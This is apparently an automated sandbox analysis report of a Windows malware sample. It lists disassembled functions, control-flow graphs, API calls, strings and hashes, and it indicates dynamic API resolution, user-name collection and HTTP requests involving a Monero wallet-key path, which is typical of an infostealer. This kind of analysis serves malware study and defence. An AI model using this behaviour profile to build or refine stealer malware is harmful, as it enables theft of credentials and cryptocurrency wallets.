                    Function 006345C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 764 6345c0-634695 RtlAllocateHeap 781 6346a0-6346a6 764->781 782 63474f-6347a9 VirtualProtect 781->782 783 6346ac-63474a 781->783 783->781
                    APIs
                    • RtlAllocateHeap.NTDLL(00000000), ref: 0063460F
                    • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0063479C
                    Strings
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0063477B
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00634770
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00634643
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006345C7
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00634657
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00634662
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00634617
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0063462D
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00634678
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006346CD
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006346B7
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0063475A
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00634713
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00634638
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00634734
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0063473F
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006346AC
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006346D8
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006346C2
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00634729
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006345E8
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006345DD
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006345F3
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006345D2
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0063471E
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0063466D
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00634765
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00634683
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0063474F
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00634622
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateHeapProtectVirtual
                    • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                    • API String ID: 1542196881-2218711628
                    • Opcode ID: 507b00ae2132315e1227f5fd42cea0bfad8c516bad7ebbda474a681515b2a836
                    • Instruction ID: ace63dd0dd96f82aef2d688d9d7b89da72332155bebf3b33c9e42e2ff2148e53
                    • Opcode Fuzzy Hash: 507b00ae2132315e1227f5fd42cea0bfad8c516bad7ebbda474a681515b2a836
                    • Instruction Fuzzy Hash: 884123247C260C6ACE74BBA4885EEAD7767DF4B746F515240BC0152282CBF076AC8F26
                    Function 00634880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 801 634880-634942 call 64a7a0 call 6347b0 call 64a740 * 5 InternetOpenA StrCmpCA 816 634944 801->816 817 63494b-63494f 801->817 816->817 818 634955-634acd call 648b60 call 64a920 call 64a8a0 call 64a800 * 2 call 64a9b0 call 64a8a0 call 64a800 call 64a9b0 call 64a8a0 call 64a800 call 64a920 call 64a8a0 call 64a800 call 64a9b0 call 64a8a0 call 64a800 call 64a9b0 call 64a8a0 call 64a800 call 64a9b0 call 64a920 call 64a8a0 call 64a800 * 2 InternetConnectA 817->818 819 634ecb-634ef3 InternetCloseHandle call 64aad0 call 639ac0 817->819 818->819 905 634ad3-634ad7 818->905 829 634f32-634fa2 call 648990 * 2 call 64a7a0 call 64a800 * 8 819->829 830 634ef5-634f2d call 64a820 call 64a9b0 call 64a8a0 call 64a800 819->830 830->829 906 634ae5 905->906 907 634ad9-634ae3 905->907 908 634aef-634b22 HttpOpenRequestA 906->908 907->908 909 634b28-634e28 call 64a9b0 call 64a8a0 call 64a800 call 64a920 call 64a8a0 call 64a800 call 64a9b0 call 64a8a0 call 64a800 call 64a9b0 call 64a8a0 call 64a800 call 64a9b0 call 64a8a0 call 64a800 call 64a9b0 call 64a8a0 call 64a800 call 64a920 call 64a8a0 call 64a800 call 64a9b0 call 64a8a0 call 64a800 call 64a9b0 call 64a8a0 call 64a800 call 64a920 call 64a8a0 call 64a800 call 64a9b0 call 64a8a0 call 64a800 call 64a9b0 call 64a8a0 call 64a800 call 64a9b0 call 64a8a0 call 64a800 call 64a9b0 call 64a8a0 call 64a800 call 64a920 call 64a8a0 call 64a800 call 64a740 call 64a920 * 2 call 64a8a0 call 64a800 * 2 call 64aad0 lstrlen call 64aad0 * 2 lstrlen call 64aad0 HttpSendRequestA 908->909 910 634ebe-634ec5 InternetCloseHandle 908->910 1021 634e32-634e5c InternetReadFile 909->1021 910->819 1022 634e67-634eb9 InternetCloseHandle call 64a800 1021->1022 1023 634e5e-634e65 1021->1023 1022->910 1023->1022 1024 634e69-634ea7 call 64a9b0 call 64a8a0 call 64a800 1023->1024 1024->1021
                    APIs
                      • Part of subcall function 0064A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0064A7E6
                      • Part of subcall function 006347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00634839
                      • Part of subcall function 006347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00634849
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00634915
                    • StrCmpCA.SHLWAPI(?,014507B0), ref: 0063493A
                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00634ABA
                    • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00650DDB,00000000,?,?,00000000,?,",00000000,?,01450600), ref: 00634DE8
                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00634E04
                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00634E18
                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00634E49
                    • InternetCloseHandle.WININET(00000000), ref: 00634EAD
                    • InternetCloseHandle.WININET(00000000), ref: 00634EC5
                    • HttpOpenRequestA.WININET(00000000,01450760,?,0144FDD8,00000000,00000000,00400100,00000000), ref: 00634B15
                      • Part of subcall function 0064A9B0: lstrlen.KERNEL32(?,01449E88,?,\Monero\wallet.keys,00650E17), ref: 0064A9C5
                      • Part of subcall function 0064A9B0: lstrcpy.KERNEL32(00000000), ref: 0064AA04
                      • Part of subcall function 0064A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0064AA12
                      • Part of subcall function 0064A8A0: lstrcpy.KERNEL32(?,00650E17), ref: 0064A905
                      • Part of subcall function 0064A920: lstrcpy.KERNEL32(00000000,?), ref: 0064A972
                      • Part of subcall function 0064A920: lstrcat.KERNEL32(00000000), ref: 0064A982
                    • InternetCloseHandle.WININET(00000000), ref: 00634ECF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                    • String ID: "$"$------$------$------
                    • API String ID: 460715078-2180234286
                    • Opcode ID: 87510aacc9bcb67afc7845e3624e64b63989dc95c0b7947c24d4ebb08fcb2b0c
                    • Instruction ID: e76b1da6bf8dc359b18b1fea805a70fc40eb2620737c8070d62e6f2596d9eb9b
                    • Opcode Fuzzy Hash: 87510aacc9bcb67afc7845e3624e64b63989dc95c0b7947c24d4ebb08fcb2b0c
                    • Instruction Fuzzy Hash: 0112F972951118BAEB58EB90DC92FEEB33ABF55300F50419DB10662091EF706F49CF6A
                    Function 00647850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006311B7), ref: 00647880
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00647887
                    • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0064789F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateNameProcessUser
                    • String ID:
                    • API String ID: 1296208442-0
                    • Opcode ID: c231deda2371d1bf1637c8e03044876dfc31978bf3df3461d29083163fa272de
                    • Instruction ID: d4c7e7b7f10c2eecb08ff4ac2bfa319c652a6149412537238abafc0662b29288
                    • Opcode Fuzzy Hash: c231deda2371d1bf1637c8e03044876dfc31978bf3df3461d29083163fa272de
                    • Instruction Fuzzy Hash: C8F04FB1D44208AFC714DF98DD4ABAEBBB8FB44711F10026AFA05A2680C77555448BA2
                    Function 00631160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExitInfoProcessSystem
                    • String ID:
                    • API String ID: 752954902-0
                    • Opcode ID: 4d277f8fab47840d91b3a464fecd47aa6f504a1683e47d2058fd4109d5b00082
                    • Instruction ID: 71474c03e4abb354d6985547a61f3e14403ed78f84a39a7cbfcc3a287a3ad20a
                    • Opcode Fuzzy Hash: 4d277f8fab47840d91b3a464fecd47aa6f504a1683e47d2058fd4109d5b00082
                    • Instruction Fuzzy Hash: 64D05E7490030CDBCB08DFE0D84D6DDBB78FB48312F000594D90962340EA3094C2CAA6
                    Function 00649C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 633 649c10-649c1a 634 64a036-64a0ca LoadLibraryA * 8 633->634 635 649c20-64a031 GetProcAddress * 43 633->635 636 64a146-64a14d 634->636 637 64a0cc-64a141 GetProcAddress * 5 634->637 635->634 638 64a216-64a21d 636->638 639 64a153-64a211 GetProcAddress * 8 636->639 637->636 640 64a21f-64a293 GetProcAddress * 5 638->640 641 64a298-64a29f 638->641 639->638 640->641 642 64a2a5-64a332 GetProcAddress * 6 641->642 643 64a337-64a33e 641->643 642->643 644 64a344-64a41a GetProcAddress * 9 643->644 645 64a41f-64a426 643->645 644->645 646 64a4a2-64a4a9 645->646 647 64a428-64a49d GetProcAddress * 5 645->647 648 64a4dc-64a4e3 646->648 649 64a4ab-64a4d7 GetProcAddress * 2 646->649 647->646 650 64a515-64a51c 648->650 651 64a4e5-64a510 GetProcAddress * 2 648->651 649->648 652 64a612-64a619 650->652 653 64a522-64a60d GetProcAddress * 10 650->653 651->650 654 64a67d-64a684 652->654 655 64a61b-64a678 GetProcAddress * 4 652->655 653->652 656 64a686-64a699 GetProcAddress 654->656 657 64a69e-64a6a5 654->657 655->654 656->657 658 64a6a7-64a703 GetProcAddress * 4 657->658 659 64a708-64a709 657->659 658->659
                    APIs
                    • GetProcAddress.KERNEL32(74DD0000,01435A30), ref: 00649C2D
                    • GetProcAddress.KERNEL32(74DD0000,014358B0), ref: 00649C45
                    • GetProcAddress.KERNEL32(74DD0000,0144A828), ref: 00649C5E
                    • GetProcAddress.KERNEL32(74DD0000,0144A858), ref: 00649C76
                    • GetProcAddress.KERNEL32(74DD0000,0144A870), ref: 00649C8E
                    • GetProcAddress.KERNEL32(74DD0000,0144A888), ref: 00649CA7
                    • GetProcAddress.KERNEL32(74DD0000,0143CD60), ref: 00649CBF
                    • GetProcAddress.KERNEL32(74DD0000,0144E198), ref: 00649CD7
                    • GetProcAddress.KERNEL32(74DD0000,0144E228), ref: 00649CF0
                    • GetProcAddress.KERNEL32(74DD0000,0144E078), ref: 00649D08
                    • GetProcAddress.KERNEL32(74DD0000,0144E108), ref: 00649D20
                    • GetProcAddress.KERNEL32(74DD0000,01435A50), ref: 00649D39
                    • GetProcAddress.KERNEL32(74DD0000,01435930), ref: 00649D51
                    • GetProcAddress.KERNEL32(74DD0000,01435830), ref: 00649D69
                    • GetProcAddress.KERNEL32(74DD0000,01435950), ref: 00649D82
                    • GetProcAddress.KERNEL32(74DD0000,0144E318), ref: 00649D9A
                    • GetProcAddress.KERNEL32(74DD0000,0144E240), ref: 00649DB2
                    • GetProcAddress.KERNEL32(74DD0000,0143CD88), ref: 00649DCB
                    • GetProcAddress.KERNEL32(74DD0000,014359B0), ref: 00649DE3
                    • GetProcAddress.KERNEL32(74DD0000,0144E1F8), ref: 00649DFB
                    • GetProcAddress.KERNEL32(74DD0000,0144E2D0), ref: 00649E14
                    • GetProcAddress.KERNEL32(74DD0000,0144E090), ref: 00649E2C
                    • GetProcAddress.KERNEL32(74DD0000,0144E1C8), ref: 00649E44
                    • GetProcAddress.KERNEL32(74DD0000,01435710), ref: 00649E5D
                    • GetProcAddress.KERNEL32(74DD0000,0144E0F0), ref: 00649E75
                    • GetProcAddress.KERNEL32(74DD0000,0144E138), ref: 00649E8D
                    • GetProcAddress.KERNEL32(74DD0000,0144E120), ref: 00649EA6
                    • GetProcAddress.KERNEL32(74DD0000,0144E150), ref: 00649EBE
                    • GetProcAddress.KERNEL32(74DD0000,0144E300), ref: 00649ED6
                    • GetProcAddress.KERNEL32(74DD0000,0144E258), ref: 00649EEF
                    • GetProcAddress.KERNEL32(74DD0000,0144E330), ref: 00649F07
                    • GetProcAddress.KERNEL32(74DD0000,0144E270), ref: 00649F1F
                    • GetProcAddress.KERNEL32(74DD0000,0144E0A8), ref: 00649F38
                    • GetProcAddress.KERNEL32(74DD0000,0144B8E0), ref: 00649F50
                    • GetProcAddress.KERNEL32(74DD0000,0144E348), ref: 00649F68
                    • GetProcAddress.KERNEL32(74DD0000,0144E0C0), ref: 00649F81
                    • GetProcAddress.KERNEL32(74DD0000,014357D0), ref: 00649F99
                    • GetProcAddress.KERNEL32(74DD0000,0144E180), ref: 00649FB1
                    • GetProcAddress.KERNEL32(74DD0000,014359D0), ref: 00649FCA
                    • GetProcAddress.KERNEL32(74DD0000,0144E288), ref: 00649FE2
                    • GetProcAddress.KERNEL32(74DD0000,0144E0D8), ref: 00649FFA
                    • GetProcAddress.KERNEL32(74DD0000,01435770), ref: 0064A013
                    • GetProcAddress.KERNEL32(74DD0000,01435B70), ref: 0064A02B
                    • LoadLibraryA.KERNEL32(0144E168,?,00645CA3,00650AEB,?,?,?,?,?,?,?,?,?,?,00650AEA,00650AE3), ref: 0064A03D
                    • LoadLibraryA.KERNEL32(0144E1E0,?,00645CA3,00650AEB,?,?,?,?,?,?,?,?,?,?,00650AEA,00650AE3), ref: 0064A04E
                    • LoadLibraryA.KERNEL32(0144E1B0,?,00645CA3,00650AEB,?,?,?,?,?,?,?,?,?,?,00650AEA,00650AE3), ref: 0064A060
                    • LoadLibraryA.KERNEL32(0144E360,?,00645CA3,00650AEB,?,?,?,?,?,?,?,?,?,?,00650AEA,00650AE3), ref: 0064A072
                    • LoadLibraryA.KERNEL32(0144E210,?,00645CA3,00650AEB,?,?,?,?,?,?,?,?,?,?,00650AEA,00650AE3), ref: 0064A083
                    • LoadLibraryA.KERNEL32(0144E2A0,?,00645CA3,00650AEB,?,?,?,?,?,?,?,?,?,?,00650AEA,00650AE3), ref: 0064A095
                    • LoadLibraryA.KERNEL32(0144E2B8,?,00645CA3,00650AEB,?,?,?,?,?,?,?,?,?,?,00650AEA,00650AE3), ref: 0064A0A7
                    • LoadLibraryA.KERNEL32(0144E2E8,?,00645CA3,00650AEB,?,?,?,?,?,?,?,?,?,?,00650AEA,00650AE3), ref: 0064A0B8
                    • GetProcAddress.KERNEL32(75290000,01435AF0), ref: 0064A0DA
                    • GetProcAddress.KERNEL32(75290000,0144E498), ref: 0064A0F2
                    • GetProcAddress.KERNEL32(75290000,0144A038), ref: 0064A10A
                    • GetProcAddress.KERNEL32(75290000,0144E450), ref: 0064A123
                    • GetProcAddress.KERNEL32(75290000,01435BD0), ref: 0064A13B
                    • GetProcAddress.KERNEL32(734C0000,0143C9F0), ref: 0064A160
                    • GetProcAddress.KERNEL32(734C0000,01435B30), ref: 0064A179
                    • GetProcAddress.KERNEL32(734C0000,0143C6A8), ref: 0064A191
                    • GetProcAddress.KERNEL32(734C0000,0144E390), ref: 0064A1A9
                    • GetProcAddress.KERNEL32(734C0000,0144E4F8), ref: 0064A1C2
                    • GetProcAddress.KERNEL32(734C0000,01435C10), ref: 0064A1DA
